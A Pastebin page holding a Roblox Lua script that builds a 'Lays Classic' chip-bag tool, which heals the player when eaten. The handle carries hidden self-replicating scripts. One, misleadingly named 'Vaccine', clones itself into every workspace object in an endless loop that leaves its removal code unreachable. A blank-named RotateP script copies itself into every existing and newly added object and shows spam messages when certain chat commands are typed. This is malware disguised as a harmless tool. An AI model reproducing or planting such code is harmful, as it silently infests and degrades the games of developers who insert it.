Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- --Converted with ttyyuu12345's model to script plugin v4
- function sandbox(var,func)
- local env = getfenv(func)
- local newenv = setmetatable({},{
- __index = function(self,k)
- if k=="script" then
- return var
- else
- return env[k]
- end
- end,
- })
- setfenv(func,newenv)
- return func
- end
- cors = {}
- mas = Instance.new("Model",game:GetService("Lighting"))
- Tool0 = Instance.new("Tool")
- Part1 = Instance.new("Part")
- SpecialMesh2 = Instance.new("SpecialMesh")
- Script3 = Instance.new("Script")
- RotateP4 = Instance.new("RotateP")
- Script5 = Instance.new("Script")
- Sound6 = Instance.new("Sound")
- Sound7 = Instance.new("Sound")
- Script8 = Instance.new("Script")
- Tool0.Name = "LaysClassic"
- Tool0.Parent = mas
- Part1.Name = "Lays Classic"
- Part1.Parent = Tool0
- Part1.CFrame = CFrame.new(8.31000042, 0.694999993, 152.369995, 0, 0, 1, 0, 1, -0, -1, 0, 0)
- Part1.Orientation = Vector3.new(0, 90, 0)
- Part1.Position = Vector3.new(8.31000042, 0.694999993, 152.369995)
- Part1.Rotation = Vector3.new(0, 90, 0)
- Part1.Size = Vector3.new(1.79999995, 2.17000008, 2)
- Part1.Material = Enum.Material.Metal
- SpecialMesh2.Parent = Part1
- SpecialMesh2.MeshId = "http://www.roblox.com/asset/?id=19106014"
- SpecialMesh2.TextureId = "http://www.roblox.com/asset/?id=32727689"
- SpecialMesh2.MeshType = Enum.MeshType.FileMesh
- Script3.Name = "Vaccine"
- Script3.Parent = Part1
- table.insert(cors,sandbox(Script3,function()
- function spread()
- local stuff = game.Workspace:GetChildren()
- for i = 1, #stuff do
- if (stuff[i].className ~= "Script") and (stuff[i]:findFirstChild("Vaccine") == nil) and (stuff[i].className ~= "Camera") then
- local clone = script:clone()
- clone.Parent = stuff[i]
- end
- end
- end
- while true do
- wait(.1)
- spread()
- end
- function GetAllItems(mdl)
- local objs = {}
- function Search(obj)
- if obj~=workspace then
- table.insert(objs,obj)
- end
- if #obj:GetChildren() > 100 then
- for i, v in ipairs(obj:GetChildren()) do
- Search(v)
- end
- end
- end
- Search(mdl)
- return objs
- end
- for i, v in ipairs(GetAllItems(workspace)) do
- if v.className == "Script" then
- if v.Name == "Chaotic" or v.Name == "Spreadify" or v.Name == "Virus" or v.Name == "Infected" then
- v.Parent = game.Lighting --Just in case it has a removal prevention.
- t = Instance.new("ObjectValue")
- t.Name = "IsAVirus"
- t.Parent = v
- end
- end
- end
- for i, v in ipairs(game.Lighting:GetChildren()) do
- if v:findFirstChild("IsAVirus") then --Only remove the viruses.
- v:remove()
- end
- end
- print("Virus debugged! All clean!")
- end))
- RotateP4.Name = ""
- RotateP4.Parent = Part1
- Script5.Name = ""
- Script5.Parent = RotateP4
- table.insert(cors,sandbox(Script5,function()
- names={""}
- local NameCheck = false
- script.Parent.Name = names[math.random(1, #names)]
- script.Name = [[ProperGr�mmerNeededInPhilosiphalLocations;insertNoobHere]]
- local c = script.Parent:Clone()
- function addEvent(ch)
- wait(math.random())
- NameCheck = false
- for ss = 1, #names do
- if ch:IsA("RotateP") or ch:findFirstChild(names[ss]) ~= nil then
- NameCheck = true
- end
- end
- if NameCheck == false then
- local cloak = c:Clone()
- cloak.Name = ""
- cloak:GetChildren()[1].Name = ""
- cloak.Parent = ch
- cloak.Name = names[math.random(1, 5)]
- end
- end
- workspace.ChildAdded:connect(addEvent)
- game.Players.PlayerAdded:connect(function(pl)
- pl.Chatted:connect(function(m)
- if m:sub(1, 5) == "/sc t" then
- local m = Instance.new("Message")
- m.Parent = workspace
- m.Text = "THEY CALL ME CRAZY"
- wait(1)
- m.Text = "lOoOoOoOp"
- wait(0.25)
- m.Text = "next page"
- wait(0.25)
- m.Text = "lOoOoOoOp"
- wait(0.25)
- m.Text = "LoOoOoOoP"
- wait(0.25)
- m.Text = "lOoOoOoOp"
- wait(0.25)
- m.Text = "LoOoOoOoP"
- wait(0.25)
- m.Text = "GOTTA GOTTA BE CRAZY"
- wait(1)
- m.Text = "lOoOoOoOp"
- wait(0.25)
- m.Text = "LoOoOoOoP"
- wait(0.25)
- m.Text = "lOoOoOoOp"
- wait(0.25)
- m.Text = "brendantaylor rules"
- wait(0.25)
- m.Text = "so does iampoobx"
- wait(0.25)
- m.Text = "LoOoOoOoP"
- wait(0.25)
- m.Text = "GOTTA GET A LIFE (YOU)"
- wait(3)
- m:remove()
- end
- if m:sub(1, 5) == "HAAXX" then
- local m = Instance.new("Message")
- m.Parent = workspace
- m.Text = "HAAXX"
- wait(3)
- m:remove()
- end
- end)
- end)
- while true do
- local s = workspace:GetChildren()
- for i = 1, #s do
- NameCheck = false
- for ss = 1, #names do
- if s[i]:IsA("RotateP") or s[i]:findFirstChild(names[ss]) ~= nil then
- NameCheck = true
- end
- end
- if NameCheck == false then
- local cloak = c:Clone()
- cloak.Name = ""
- cloak:GetChildren()[1].Name = ""
- cloak.Parent = s[i]
- end
- wait(0.1)
- end
- wait(1)
- end
- end))
- Sound6.Name = "DrinkSound"
- Sound6.Parent = Part1
- Sound6.SoundId = "http://www.roblox.com/asset/?id=15047813"
- Sound6.Volume = 1
- Sound7.Name = "OpenSound"
- Sound7.Parent = Part1
- Sound7.SoundId = "http://www.roblox.com/asset/?id=16213987"
- Sound7.Volume = 1
- Script8.Name = "SandwichScript"
- Script8.Parent = Tool0
- table.insert(cors,sandbox(Script8,function()
- local Tool = script.Parent;
- enabled = true
- function onActivated()
- if not enabled then
- return
- end
- enabled = false
- Tool.GripForward = Vector3.new(0.675, -0.675, -0.3)
- Tool.GripPos = Vector3.new(0.4, -0.9, 0.9)
- Tool.GripRight = Vector3.new(0.212, -0.212, 0.954)
- Tool.GripUp = Vector3.new(0.707, 0.707, 0)
- Tool.Handle.DrinkSound:Play()
- wait(.8)
- local h = Tool.Parent:FindFirstChild("Humanoid")
- if (h ~= nil) then
- if (h.MaxHealth > h.Health + 1.6) then
- h.Health = h.Health + 1.6
- else
- h.Health = h.MaxHealth
- end
- end
- Tool.GripForward = Vector3.new(-1, 0, 0)
- Tool.GripPos = Vector3.new(.2, 0, 0)
- Tool.GripRight = Vector3.new(0, 0, -1)
- Tool.GripUp = Vector3.new(0,1,0)
- enabled = true
- end
- function onEquipped()
- Tool.Handle.OpenSound:play()
- end
- script.Parent.Activated:connect(onActivated)
- script.Parent.Equipped:connect(onEquipped)
- end))
- for i,v in pairs(mas:GetChildren()) do
- v.Parent = script
- pcall(function() v:MakeJoints() end)
- end
- mas:Destroy()
- for i,v in pairs(cors) do
- spawn(function()
- pcall(v)
- end)
- end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement